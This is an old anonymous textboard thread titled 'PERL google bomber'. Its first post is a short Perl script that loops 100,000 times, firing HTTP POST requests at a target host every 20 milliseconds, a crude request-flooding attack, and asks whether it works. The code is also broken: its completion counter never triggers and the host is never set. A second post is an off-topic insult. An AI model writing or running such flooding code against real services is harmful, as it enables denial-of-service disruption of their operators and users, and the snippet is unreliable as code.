Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

PERL google bomber

Name: does it work? 2011-04-09 20:26

my $ua = LWP::UserAgent->new();
my $num = 0;

for (1..100000) {
    select(undef, undef, undef, .020);
    $num = int ($num + 1);
    $ua->post($host);
    if ($num == 2000000){
            print "complete.";
    }
}

Name: Anonymous 2011-04-10 2:42

who the fuck is fairX?

Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List